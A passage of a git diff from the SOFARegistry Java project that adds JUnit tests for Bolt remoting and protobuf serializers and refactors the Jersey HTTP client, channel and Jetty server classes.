Assert.fail(); + } catch (Throwable exception) { + Assert.assertEquals(exception.getClass(), eclazz); + } + } + + public static void assertRunException(Class eclazz, RunError runnable) { + try { + runnable.run(); + Assert.fail(); + } catch (Throwable exception) { + Assert.assertEquals(exception.getClass(), eclazz); + } + } + + public static void assertRunExceptionCause(Class eclazz, RunError runnable) { + try { + runnable.run(); + Assert.fail(); + } catch (Throwable exception) { + Assert.assertEquals(exception.getCause().getClass(), eclazz); + } + } + + public interface RunError { + void run() throws Exception; + } +} diff --git a/server/remoting/bolt/src/test/java/com/alipay/sofa/registry/remoting/bolt/exchange/BoltExchangeTest.java b/server/remoting/bolt/src/test/java/com/alipay/sofa/registry/remoting/bolt/exchange/BoltExchangeTest.java new file mode 100644 index 000000000..e80503429 --- /dev/null +++ b/server/remoting/bolt/src/test/java/com/alipay/sofa/registry/remoting/bolt/exchange/BoltExchangeTest.java @@ -0,0 +1,63 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.remoting.bolt.exchange; + +import com.alipay.sofa.registry.common.model.store.URL; +import com.alipay.sofa.registry.remoting.ChannelHandler; +import com.alipay.sofa.registry.remoting.Server; +import com.alipay.sofa.registry.remoting.bolt.TestUtils; +import org.junit.Assert; +import org.junit.Test; + +public class BoltExchangeTest { + @Test + public void testException() { + BoltExchange exchange = new BoltExchange(); + TestUtils.assertException( + IllegalArgumentException.class, + () -> exchange.connect("test", new URL("127.0.0.1", 8888), null)); + + TestUtils.assertException( + IllegalArgumentException.class, + () -> exchange.open(new URL("127.0.0.1", 8888), 1024, 1024 * 2, null)); + } + + @Test + public void test() { + BoltExchange exchange = new BoltExchange(); + Assert.assertNull(exchange.getServer(9999)); + Server srv = null; + try { + srv = exchange.open(new URL("localhost", 9999), 1024, 1024 * 2, new ChannelHandler[0]); + Assert.assertEquals(exchange.getServer(9999), srv); + } finally { + if (srv != null) { + srv.close(); + } + } + + Assert.assertNull(exchange.getServer(9998)); + try { + srv = exchange.open(new URL("localhost", 9998), new ChannelHandler[0]); + Assert.assertEquals(exchange.getServer(9998), srv); + } finally { + if (srv != null) { + srv.close(); + } + } + } +} diff --git a/server/remoting/bolt/src/test/java/com/alipay/sofa/registry/remoting/bolt/serializer/CustomClassSerializerManagerTest.java b/server/remoting/bolt/src/test/java/com/alipay/sofa/registry/remoting/bolt/serializer/CustomClassSerializerManagerTest.java new file mode 100644 index 000000000..b168cbf27 --- /dev/null +++ b/server/remoting/bolt/src/test/java/com/alipay/sofa/registry/remoting/bolt/serializer/CustomClassSerializerManagerTest.java @@ -0,0 +1,37 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.remoting.bolt.serializer; + +import com.alipay.sofa.registry.remoting.bolt.TestUtils; +import org.junit.Assert; +import org.junit.Test; + +public class CustomClassSerializerManagerTest { + @Test + public void test() { + TestUtils.assertException( + IllegalArgumentException.class, + () -> CustomClassSerializerManager.registerSerializer(null, (byte) 1)); + TestUtils.assertException( + IllegalArgumentException.class, + () -> CustomClassSerializerManager.registerSerializer(Integer.class, null)); + CustomClassSerializerManager.registerSerializer(Integer.class, (byte) 1); + Assert.assertEquals( + CustomClassSerializerManager.getClassSerializer(Integer.class).byteValue(), 1); + Assert.assertNull(CustomClassSerializerManager.getClassSerializer(Long.class)); + } +} diff --git a/server/remoting/bolt/src/test/java/com/alipay/sofa/registry/remoting/bolt/serializer/ProtobufCustomSerializerTest.java b/server/remoting/bolt/src/test/java/com/alipay/sofa/registry/remoting/bolt/serializer/ProtobufCustomSerializerTest.java new file mode 100644 index 000000000..76f6d130a --- /dev/null +++ b/server/remoting/bolt/src/test/java/com/alipay/sofa/registry/remoting/bolt/serializer/ProtobufCustomSerializerTest.java @@ -0,0 +1,93 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.remoting.bolt.serializer; + +import com.alipay.remoting.exception.DeserializationException; +import com.alipay.remoting.rpc.HeartbeatAckCommand; +import com.alipay.remoting.rpc.HeartbeatCommand; +import com.alipay.remoting.rpc.protocol.RpcRequestCommand; +import com.alipay.remoting.rpc.protocol.RpcResponseCommand; +import org.junit.Assert; +import org.junit.Test; + +public class ProtobufCustomSerializerTest { + + @Test + public void testHeader() { + ProtobufCustomSerializer serializer = new ProtobufCustomSerializer(); + Assert.assertFalse(serializer.serializeHeader(null, null)); + Assert.assertFalse(serializer.serializeHeader(null)); + Assert.assertFalse(serializer.deserializeHeader(null, null)); + Assert.assertFalse(serializer.deserializeHeader(null)); + } + + @Test + public void testSerdeNotRpcCommand() throws Exception { + ProtobufCustomSerializer serializer = new ProtobufCustomSerializer(); + + Assert.assertFalse(serializer.serializeContent(new HeartbeatCommand(), null)); + Assert.assertFalse(serializer.serializeContent(new HeartbeatAckCommand())); + + Assert.assertFalse(serializer.deserializeContent(new HeartbeatCommand())); + Assert.assertFalse(serializer.deserializeContent(new HeartbeatAckCommand(), null)); + } + + @Test + public void testSerdeReq() throws Exception { + ProtobufCustomSerializer serializer = new ProtobufCustomSerializer(); + RpcRequestCommand command = new RpcRequestCommand("testObj"); + Assert.assertTrue(serializer.serializeContent(command, null)); + + Assert.assertNotNull(command.getContent()); + Assert.assertFalse(command.getContentLength() == 0); + + command.setSerializer(ProtobufCustomSerializer.PROTOCOL_PROTOBUF); + // not set clazz, exception + try { + serializer.deserializeContent(command); + Assert.fail("expect DeserializationException"); + } catch (DeserializationException e) { + } + + command.setRequestClass(String.class.getName()); + Assert.assertTrue(serializer.deserializeContent(command)); + Assert.assertEquals(command.getRequestObject(), "testObj"); + } + + @Test + public void testSerdeRep() throws Exception { + ProtobufCustomSerializer serializer = new ProtobufCustomSerializer(); + RpcResponseCommand command = new RpcResponseCommand("testObj"); + command.setSerializer(ProtobufCustomSerializer.PROTOCOL_PROTOBUF); + command.setResponseObject("testObj"); + Assert.assertTrue(serializer.serializeContent(command)); + + Assert.assertNotNull(command.getContent()); + Assert.assertFalse(command.getContentLength() == 0); + + // not set clazz, exception + try { + serializer.deserializeContent(command, null); + Assert.fail("expect DeserializationException"); + } catch (DeserializationException e) { + } + + command.setResponseClass(String.class.getName()); + Assert.assertTrue(serializer.deserializeContent(command, null)); + Assert.assertEquals(command.getResponseObject(), "testObj"); + } +} diff --git a/server/remoting/bolt/src/test/java/com/alipay/sofa/registry/remoting/bolt/serializer/ProtobufSerializerTest.java b/server/remoting/bolt/src/test/java/com/alipay/sofa/registry/remoting/bolt/serializer/ProtobufSerializerTest.java new file mode 100644 index 000000000..d70e664b1 --- /dev/null +++ b/server/remoting/bolt/src/test/java/com/alipay/sofa/registry/remoting/bolt/serializer/ProtobufSerializerTest.java @@ -0,0 +1,41 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.remoting.bolt.serializer; + +import com.alipay.remoting.exception.DeserializationException; +import com.alipay.remoting.exception.SerializationException; +import com.alipay.sofa.registry.remoting.bolt.TestUtils; +import org.junit.Assert; +import org.junit.Test; + +public class ProtobufSerializerTest { + @Test + public void testException() { + ProtobufSerializer serializer = ProtobufSerializer.getInstance(); + TestUtils.assertRunException(SerializationException.class, () -> serializer.serialize(null)); + TestUtils.assertRunException( + SerializationException.class, () -> serializer.serialize(new Integer(10))); + TestUtils.assertRunException( + SerializationException.class, () -> serializer.deserialize(null, "classNotExist")); + TestUtils.assertRunException( + DeserializationException.class, () -> serializer.decode(null, Integer.class)); + + Assert.assertFalse(ProtobufSerializer.isProtoBufMessageLite(null)); + Assert.assertFalse(ProtobufSerializer.isProtoBufMessageLite(new Integer(10))); + Assert.assertFalse(ProtobufSerializer.isProtoBufMessageLite("xx")); + } +} diff --git a/server/remoting/http/pom.xml b/server/remoting/http/pom.xml index df9645432..5de220e1b 100644 --- a/server/remoting/http/pom.xml +++ b/server/remoting/http/pom.xml @@ -5,7 +5,7 @@ com.alipay.sofa registry-remoting - 5.2.0-SNAPSHOT + 6.0.1 ../pom.xml 4.0.0 diff --git a/server/remoting/http/src/main/java/com/alipay/sofa/registry/remoting/jersey/JerseyChannel.java b/server/remoting/http/src/main/java/com/alipay/sofa/registry/remoting/jersey/JerseyChannel.java index 54154d40f..659ba98b3 100644 --- a/server/remoting/http/src/main/java/com/alipay/sofa/registry/remoting/jersey/JerseyChannel.java +++ b/server/remoting/http/src/main/java/com/alipay/sofa/registry/remoting/jersey/JerseyChannel.java @@ -18,80 +18,65 @@ import com.alipay.sofa.registry.net.NetUtil; import com.alipay.sofa.registry.remoting.Channel; - -import javax.ws.rs.client.Client; -import javax.ws.rs.client.WebTarget; import java.net.InetSocketAddress; import java.net.URI; +import javax.ws.rs.client.Client; +import javax.ws.rs.client.WebTarget; /** - * * @author shangyu.wh * @version $Id: JerseyChannel.java, v 0.1 2018-02-01 11:35 shangyu.wh Exp $ */ public class JerseyChannel implements Channel { - private WebTarget webTarget; + private final WebTarget webTarget; - private Client client; + private final Client client; - @Override - public InetSocketAddress getRemoteAddress() { - if (webTarget != null) { - URI uri = webTarget.getUri(); - return new InetSocketAddress(uri.getHost(), uri.getPort()); - } - return null; - } + public JerseyChannel(WebTarget webTarget, Client client) { + this.webTarget = webTarget; + this.client = client; + } - @Override - public InetSocketAddress getLocalAddress() { - return NetUtil.getLocalSocketAddress(); - } + @Override + public InetSocketAddress getRemoteAddress() { + URI uri = webTarget.getUri(); + return new InetSocketAddress(uri.getHost(), uri.getPort()); + } - @Override - public boolean isConnected() { - if (client instanceof org.glassfish.jersey.client.JerseyClient) { - return !((org.glassfish.jersey.client.JerseyClient) client).isClosed(); - } - return false; - } + @Override + public InetSocketAddress getLocalAddress() { + return NetUtil.getLocalSocketAddress(); + } - @Override - public Object getAttribute(String key) { - return null; + @Override + public boolean isConnected() { + if (client instanceof org.glassfish.jersey.client.JerseyClient) { + return !((org.glassfish.jersey.client.JerseyClient) client).isClosed(); } + return false; + } - @Override - public void setAttribute(String key, Object value) { + @Override + public Object getAttribute(String key) { + return null; + } - } + @Override + public void setAttribute(String key, Object value) {} - /** - * Getter method for property webTarget. - * - * @return property value of webTarget - */ - @Override - public WebTarget getWebTarget() { - return webTarget; - } + /** + * Getter method for property webTarget. + * + * @return property value of webTarget + */ + @Override + public WebTarget getWebTarget() { + return webTarget; + } - /** - * Setter method for property webTarget. - * - * @param webTarget value to be assigned to property webTarget - */ - public void setWebTarget(WebTarget webTarget) { - this.webTarget = webTarget; - } - - /** - * Setter method for property client. - * - * @param client value to be assigned to property client - */ - public void setClient(Client client) { - this.client = client; - } -} \ No newline at end of file + @Override + public void close() { + client.close(); + } +} diff --git a/server/remoting/http/src/main/java/com/alipay/sofa/registry/remoting/jersey/JerseyClient.java b/server/remoting/http/src/main/java/com/alipay/sofa/registry/remoting/jersey/JerseyClient.java index 825a7dd51..8c60da84a 100644 --- a/server/remoting/http/src/main/java/com/alipay/sofa/registry/remoting/jersey/JerseyClient.java +++ b/server/remoting/http/src/main/java/com/alipay/sofa/registry/remoting/jersey/JerseyClient.java @@ -22,178 +22,136 @@ import com.alipay.sofa.registry.net.NetUtil; import com.alipay.sofa.registry.remoting.CallbackHandler; import com.alipay.sofa.registry.remoting.Channel; -import com.alipay.sofa.registry.remoting.ChannelHandler; import com.alipay.sofa.registry.remoting.Client; -import org.glassfish.jersey.client.ClientConfig; -import org.glassfish.jersey.client.HttpUrlConnectorProvider; -import org.glassfish.jersey.jackson.JacksonFeature; - -import javax.ws.rs.client.ClientBuilder; -import javax.ws.rs.client.WebTarget; -import javax.ws.rs.core.UriBuilder; import java.net.InetSocketAddress; import java.net.URI; -import java.util.Collection; import java.util.HashMap; -import java.util.List; import java.util.Map; import java.util.concurrent.atomic.AtomicReference; +import javax.ws.rs.client.ClientBuilder; +import javax.ws.rs.client.WebTarget; +import javax.ws.rs.core.UriBuilder; +import org.glassfish.jersey.client.ClientConfig; +import org.glassfish.jersey.client.ClientProperties; +import org.glassfish.jersey.client.HttpUrlConnectorProvider; +import org.glassfish.jersey.jackson.JacksonFeature; /** - * * @author shangyu.wh * @version $Id: JerseyClient.java, v 0.1 2018-01-30 11:13 shangyu.wh Exp $ */ public class JerseyClient implements Client { - private static final Logger LOGGER = LoggerFactory - .getLogger(JerseyClient.class); - private volatile static JerseyClient instance; - private final AtomicReference client = new AtomicReference<>(null); - private Map channels = new HashMap<>(); - - /** - * constructor - */ - public JerseyClient() { - setClient(getClient(null)); - } - - /** - * get instance of jerseyClient - * @return - */ - public static JerseyClient getInstance() { - if (instance == null) { - synchronized (JerseyClient.class) { - if (instance == null) { - instance = new JerseyClient(); - } - } - } - return instance; - } - - @Override - public Channel connect(URL url) { - try { - - JerseyChannel channel = new JerseyChannel(); - channel.setWebTarget(getTarget(url)); - channel.setClient(getClient()); - channels.put(url.getAddressString(), channel); - return channel; - } catch (Exception e) { - LOGGER.error("Create jersey connect:" + url + " error!", e); - throw new RuntimeException("Create jersey connect:" + url + " error!", e); - } - } - - private WebTarget getTarget(URL targetUrl) { - return getClient().target(getBaseUri(targetUrl)); - } - - private javax.ws.rs.client.Client getClient(ClientConfig clientConfig) { - if (clientConfig == null) { - clientConfig = new ClientConfig(); - } - - clientConfig.connectorProvider(new HttpUrlConnectorProvider()); - - clientConfig.register(JacksonFeature.class); - - return ClientBuilder.newClient(clientConfig); - } - - public javax.ws.rs.client.Client getClient() { - return client.get(); - } - - public void setClient(final javax.ws.rs.client.Client clientIn) { - client.getAndSet(clientIn); - } - - public URI getBaseUri(URL targetUrl) { - URI uri; - try { - uri = UriBuilder.fromUri("http://" + targetUrl.getIpAddress() + "/") - .port(targetUrl.getPort()).build(); - } catch (Exception e) { - LOGGER.error("get server URI error!", e); - throw new RuntimeException("get server URI error!", e); - } - return uri; - } - - @Override - public Collection getChannels() { - return null; - } - - @Override - public Channel getChannel(InetSocketAddress remoteAddress) { - Channel c = channels.get(NetUtil.toAddressString(remoteAddress)); - if (c == null) { - return null; - } else { - if (!c.isConnected()) { - connect(new URL(remoteAddress)); - } - } - return c; - } - - @Override - public Channel getChannel(URL url) { - Channel c = channels.get(url.getAddressString()); - if (c == null) { - return null; - } else { - if (!c.isConnected()) { - connect(url); - } - } - return c; - } - - @Override - public List getChannelHandlers() { - return null; - } - - @Override - public InetSocketAddress getLocalAddress() { - return NetUtil.getLocalSocketAddress(); - } - - @Override - public void close() { - - } - - @Override - public void close(Channel channel) { - - } - - @Override - public boolean isClosed() { - return false; - } - - @Override - public void sendOneway(Channel channel, Object message) { - - } - - @Override - public Object sendSync(Channel channel, Object message, int timeoutMillis) { - return null; - } - - @Override - public void sendCallback(Channel channel, Object message, CallbackHandler callbackHandler, - int timeoutMillis) { - - } -} \ No newline at end of file + private static final Logger LOGGER = LoggerFactory.getLogger(JerseyClient.class); + private static final JerseyClient instance = new JerseyClient(); + + private final AtomicReference client = new AtomicReference<>(null); + + private Map channels = new HashMap<>(); + + /** constructor */ + public JerseyClient() { + setClient(getClient(null)); + } + + /** + * get instance of jerseyClient + * + * @return + */ + public static JerseyClient getInstance() { + return instance; + } + + @Override + public Channel connect(URL url) { + try { + JerseyChannel channel = new JerseyChannel(getTarget(url), getClient()); + channels.put(url.getAddressString(), channel); + return channel; + } catch (Exception e) { + LOGGER.error("Create jersey connect:" + url + " error!", e); + throw new RuntimeException("Create jersey connect:" + url + " error!", e); + } + } + + @Override + public Object sendSync(URL url, Object message, int timeoutMillis) { + return null; + } + + @Override + public Object sendSync(Channel channel, Object message, int timeoutMillis) { + return null; + } + + @Override + public void sendCallback( + URL url, Object message, CallbackHandler callbackHandler, int timeoutMillis) {} + + private WebTarget getTarget(URL targetUrl) { + return getClient().target(getBaseUri(targetUrl)); + } + + private javax.ws.rs.client.Client getClient(ClientConfig clientConfig) { + if (clientConfig == null) { + clientConfig = new ClientConfig(); + clientConfig.property(ClientProperties.CONNECT_TIMEOUT, 3000); + clientConfig.property(ClientProperties.READ_TIMEOUT, 5000); + } + + clientConfig.connectorProvider(new HttpUrlConnectorProvider()); + + clientConfig.register(JacksonFeature.class); + + return ClientBuilder.newClient(clientConfig); + } + + public javax.ws.rs.client.Client getClient() { + return client.get(); + } + + public void setClient(final javax.ws.rs.client.Client clientIn) { + client.getAndSet(clientIn); + } + + public URI getBaseUri(URL targetUrl) { + URI uri; + try { + uri = + UriBuilder.fromUri("http://" + targetUrl.getIpAddress() + "/") + .port(targetUrl.getPort()) + .build(); + } catch (Exception e) { + LOGGER.error("get server URI error!", e); + throw new RuntimeException("get server URI error!", e); + } + return uri; + } + + @Override + public Channel getChannel(URL url) { + Channel c = channels.get(url.getAddressString()); + if (c == null) { + return null; + } else { + if (!c.isConnected()) { + connect(url); + } + } + return c; + } + + @Override + public InetSocketAddress getLocalAddress() { + return NetUtil.getLocalSocketAddress(); + } + + @Override + public void close() {} + + @Override + public boolean isClosed() { + return false; + } +} diff --git a/server/remoting/http/src/main/java/com/alipay/sofa/registry/remoting/jersey/JerseyJettyServer.java b/server/remoting/http/src/main/java/com/alipay/sofa/registry/remoting/jersey/JerseyJettyServer.java index 680384881..10774615c 100644 --- a/server/remoting/http/src/main/java/com/alipay/sofa/registry/remoting/jersey/JerseyJettyServer.java +++ b/server/remoting/http/src/main/java/com/alipay/sofa/registry/remoting/jersey/JerseyJettyServer.java @@ -21,11 +21,19 @@ import com.alipay.sofa.registry.log.LoggerFactory; import com.alipay.sofa.registry.remoting.CallbackHandler; import com.alipay.sofa.registry.remoting.Channel; -import com.alipay.sofa.registry.remoting.ChannelHandler; import com.alipay.sofa.registry.remoting.Server; import com.alipay.sofa.registry.remoting.jersey.jetty.server.HttpConnectionCustomFactory; -import org.eclipse.jetty.server.Connector; -import org.eclipse.jetty.server.ServerConnector; +import java.net.InetSocketAddress; +import java.net.URI; +import java.util.Collections; +import java.util.List; +import java.util.Map; +import java.util.concurrent.ThreadFactory; +import java.util.concurrent.atomic.AtomicBoolean; +import javax.ws.rs.ProcessingException; +import org.eclipse.jetty.server.*; +import org.eclipse.jetty.util.log.Log; +import org.eclipse.jetty.util.log.Slf4jLog; import org.eclipse.jetty.util.thread.QueuedThreadPool; import org.glassfish.jersey.internal.guava.ThreadFactoryBuilder; import org.glassfish.jersey.jetty.JettyHttpContainer; @@ -35,193 +43,177 @@ import org.glassfish.jersey.server.ResourceConfig; import org.glassfish.jersey.server.spi.Container; -import javax.ws.rs.ProcessingException; -import java.net.InetSocketAddress; -import java.net.URI; -import java.util.Collection; -import java.util.List; -import java.util.concurrent.ThreadFactory; -import java.util.concurrent.atomic.AtomicBoolean; - /** - * * @author shangyu.wh * @version $Id: Jersey.java, v 0.1 2018-01-29 17:57 shangyu.wh Exp $ */ public class JerseyJettyServer implements Server { - - private static final Logger LOGGER = LoggerFactory - .getLogger(JerseyJettyServer.class); - - private final ResourceConfig resourceConfig; - - private final URI baseUri; - - private org.eclipse.jetty.server.Server server; - /** - * started status - */ - private AtomicBoolean isStarted = new AtomicBoolean(false); - - /** - * constructor - * @param resourceConfig - * @param baseUri - */ - public JerseyJettyServer(ResourceConfig resourceConfig, URI baseUri) { - this.resourceConfig = resourceConfig; - this.baseUri = baseUri; - } - - /** - * start jersey server - */ - public void startServer() { - if (isStarted.compareAndSet(false, true)) { - try { - - server = createServer(getBaseUri(), resourceConfig, true); - - } catch (Exception e) { - isStarted.set(false); - LOGGER.error("Start Jetty jersey server error!", e); - throw new RuntimeException("Start Jetty jersey server error!", e); - } - } - } - - public static org.eclipse.jetty.server.Server createServer(final URI uri, - final ResourceConfig resourceConfig, - final boolean start) { - if (uri == null) { - throw new IllegalArgumentException(LocalizationMessages.URI_CANNOT_BE_NULL()); - } - - JettyHttpContainer handler = ContainerFactory.createContainer(JettyHttpContainer.class, - resourceConfig); - - int defaultPort = Container.DEFAULT_HTTP_PORT; - - final int port = (uri.getPort() == -1) ? defaultPort : uri.getPort(); - - final org.eclipse.jetty.server.Server server = new org.eclipse.jetty.server.Server( - new JettyConnectorThreadPool()); - - final ServerConnector http = new ServerConnector(server, new HttpConnectionCustomFactory()); - http.setPort(port); - server.setConnectors(new Connector[] { http }); - - if (handler != null) { - server.setHandler(handler); - } - - if (start) { - try { - // Start the server. - server.start(); - } catch (final Exception e) { - throw new ProcessingException(LocalizationMessages.ERROR_WHEN_CREATING_SERVER(), e); - } - } - return server; - } - - private static final class JettyConnectorThreadPool extends QueuedThreadPool { - private final ThreadFactory threadFactory = new ThreadFactoryBuilder() - .setNameFormat("jetty-http-server-%d") - .setUncaughtExceptionHandler( - new JerseyProcessingUncaughtExceptionHandler()) - .build(); - - @Override - protected Thread newThread(Runnable runnable) { - return threadFactory.newThread(runnable); - } - } - - @Override - public boolean isOpen() { - if (server != null) { - return server.isStarted(); - } - return false; - } + private static final String NCSA_FORMAT = "%{client}a \"%r\" %s %O"; + private static final Logger LOGGER = LoggerFactory.getLogger(JerseyJettyServer.class); + + private final ResourceConfig resourceConfig; + + private final URI baseUri; + + private org.eclipse.jetty.server.Server server; + /** started status */ + private final AtomicBoolean isStarted = new AtomicBoolean(false); + + /** + * constructor + * + * @param resourceConfig + * @param baseUri + */ + public JerseyJettyServer(ResourceConfig resourceConfig, URI baseUri) { + this.resourceConfig = resourceConfig; + this.baseUri = baseUri; + } + + /** start jersey server */ + public void startServer() { + if (isStarted.compareAndSet(false, true)) { + try { + Log.setLog(new Slf4jLog()); + server = createServer(getBaseUri(), resourceConfig, true); + } catch (Throwable e) { + isStarted.set(false); + LOGGER.error("Start Jetty jersey server error!", e); + throw new RuntimeException("Start Jetty jersey server error!", e); + } + } + } + + public static org.eclipse.jetty.server.Server createServer( + final URI uri, final ResourceConfig resourceConfig, final boolean start) { + if (uri == null) { + throw new IllegalArgumentException(LocalizationMessages.URI_CANNOT_BE_NULL()); + } + + JettyHttpContainer handler = + ContainerFactory.createContainer(JettyHttpContainer.class, resourceConfig); + + int defaultPort = Container.DEFAULT_HTTP_PORT; + + final int port = (uri.getPort() == -1) ? defaultPort : uri.getPort(); + + final org.eclipse.jetty.server.Server server = + new org.eclipse.jetty.server.Server(new JettyConnectorThreadPool()); + // init requestLog + Slf4jRequestLogWriter writer = new Slf4jRequestLogWriter(); + CustomRequestLog log = new CustomRequestLog(writer, NCSA_FORMAT); + server.setRequestLog(log); + final ServerConnector http = new ServerConnector(server, new HttpConnectionCustomFactory()); + http.setPort(port); + server.setConnectors(new Connector[] {http}); + if (handler != null) { + server.setHandler(handler); + } + + if (start) { + try { + // Start the server. + server.start(); + } catch (Throwable e) { + throw new ProcessingException(LocalizationMessages.ERROR_WHEN_CREATING_SERVER(), e); + } + } + return server; + } + + private static final class JettyConnectorThreadPool extends QueuedThreadPool { + private final ThreadFactory threadFactory = + new ThreadFactoryBuilder() + .setNameFormat("jetty-http-server-%d") + .setUncaughtExceptionHandler(new JerseyProcessingUncaughtExceptionHandler()) + .build(); @Override - public Collection getChannels() { - return null; - } - - @Override - public Channel getChannel(InetSocketAddress remoteAddress) { - return null; - } - - @Override - public Channel getChannel(URL url) { - return null; - } - - @Override - public List getChannelHandlers() { - return null; - } - - @Override - public InetSocketAddress getLocalAddress() { - return new InetSocketAddress(getBaseUri().getPort()); - } - - @Override - public void close() { - if (server != null) { - try { - server.stop(); - } catch (Exception e) { - LOGGER.error("Jersey Jetty Server stop error!", e); - throw new RuntimeException("Jersey Jetty Server stop error!", e); - } - return; - } - throw new RuntimeException("Jersey Server has not started!Server Channel has not created!"); - } - - @Override - public void close(Channel channel) { - throw new UnsupportedOperationException("Jersey Server don't support close Channel."); - } - - @Override - public boolean isClosed() { - if (server != null) { - return server.isStopped(); - } - return true; - } - - @Override - public void sendOneway(Channel channel, Object message) { - - } - - @Override - public Object sendSync(Channel channel, Object message, int timeoutMillis) { - return null; - } - - @Override - public void sendCallback(Channel channel, Object message, CallbackHandler callbackHandler, - int timeoutMillis) { - - } - - /** - * Getter method for property baseUri. - * - * @return property value of baseUri - */ - public URI getBaseUri() { - return baseUri; - } - -} \ No newline at end of file + protected Thread newThread(Runnable runnable) { + return threadFactory.newThread(runnable); + } + } + + @Override + public boolean isOpen() { + if (server != null) { + return server.isStarted(); + } + return false; + } + + @Override + public List getChannels() { + return Collections.emptyList(); + } + + @Override + public Map selectAvailableChannelsForHostAddress() { + throw new UnsupportedOperationException(); + } + + @Override + public Channel getChannel(InetSocketAddress remoteAddress) { + return null; + } + + @Override + public Channel getChannel(URL url) { + return null; + } + + @Override + public void close(Channel channel) { + throw new UnsupportedOperationException("Jersey Server don't support close Channel."); + } + + @Override + public InetSocketAddress getLocalAddress() { + return new InetSocketAddress(getBaseUri().getPort()); + } + + @Override + public void close() { + if (server != null) { + try { + server.stop(); + } catch (Throwable e) { + LOGGER.error("Jersey Jetty Server stop error!", e); + throw new RuntimeException("Jersey Jetty Server stop error!", e); + } + return; + } + throw new RuntimeException("Jersey Server has not started!Server Channel has not created!"); + } + + @Override + public boolean isClosed() { + if (server != null) { + return server.isStopped(); + } + return true; + } + + @Override + public Object sendSync(Channel channel, Object message, int timeoutMillis) { + return null; + } + + @Override + public void sendCallback( + Channel channel, Object message, CallbackHandler callbackHandler, int timeoutMillis) {} + + /** + * Getter method for property baseUri. + * + * @return property value of baseUri + */ + public URI getBaseUri() { + return baseUri; + } + + @Override + public int getChannelCount() { + return 0; + } +} diff --git a/server/remoting/http/src/main/java/com/alipay/sofa/registry/remoting/jersey/exchange/JerseyExchange.java b/server/remoting/http/src/main/java/com/alipay/sofa/registry/remoting/jersey/exchange/JerseyExchange.java index be001a92b..293b3e81c 100644 --- a/server/remoting/http/src/main/java/com/alipay/sofa/registry/remoting/jersey/exchange/JerseyExchange.java +++ b/server/remoting/http/src/main/java/com/alipay/sofa/registry/remoting/jersey/exchange/JerseyExchange.java @@ -24,84 +24,93 @@ import com.alipay.sofa.registry.remoting.exchange.Exchange; import com.alipay.sofa.registry.remoting.jersey.JerseyClient; import com.alipay.sofa.registry.remoting.jersey.JerseyJettyServer; -import org.glassfish.jersey.server.ResourceConfig; - -import javax.ws.rs.core.UriBuilder; import java.net.URI; import java.util.concurrent.ConcurrentHashMap; +import javax.ws.rs.core.UriBuilder; +import org.glassfish.jersey.server.ResourceConfig; /** - * * @author shangyu.wh * @version $Id: JerseyExchange.java, v 0.1 2018-01-29 19:49 shangyu.wh Exp $ */ public class JerseyExchange implements Exchange { - private static final Logger LOGGER = LoggerFactory - .getLogger(JerseyExchange.class); + private static final Logger LOGGER = LoggerFactory.getLogger(JerseyExchange.class); - private ConcurrentHashMap serverMap = new ConcurrentHashMap<>(); + private ConcurrentHashMap serverMap = new ConcurrentHashMap<>(); - private Client client; + private Client client; - @Override - public Client connect(String serverType, URL serverUrl, ResourceConfig... channelHandlers) { - JerseyClient jerseyClient = JerseyClient.getInstance(); - setClient(jerseyClient); - return jerseyClient; - } + @Override + public Client connect(String serverType, URL serverUrl, ResourceConfig... channelHandlers) { + JerseyClient jerseyClient = JerseyClient.getInstance(); + setClient(jerseyClient); + return jerseyClient; + } - @Override - public Server open(URL url, ResourceConfig... resources) { + @Override + public Client connect( + String serverType, int connNum, URL serverUrl, ResourceConfig... channelHandlers) { + throw new UnsupportedOperationException(); + } - URI uri; - try { - uri = UriBuilder.fromUri("http://" + url.getIpAddress() + "/").port(url.getPort()) - .build(); - } catch (Exception e) { - LOGGER.error("get server URI error!", e); - throw new RuntimeException("get server URI error!", e); - } - JerseyJettyServer jerseyServer = new JerseyJettyServer(resources[0], uri); - setServer(jerseyServer, url); - jerseyServer.startServer(); + @Override + public Server open(URL url, ResourceConfig... resources) { - return jerseyServer; + URI uri; + try { + uri = UriBuilder.fromUri("http://" + url.getIpAddress() + "/").port(url.getPort()).build(); + } catch (Exception e) { + LOGGER.error("get server URI error!", e); + throw new RuntimeException("get server URI error!", e); } + JerseyJettyServer 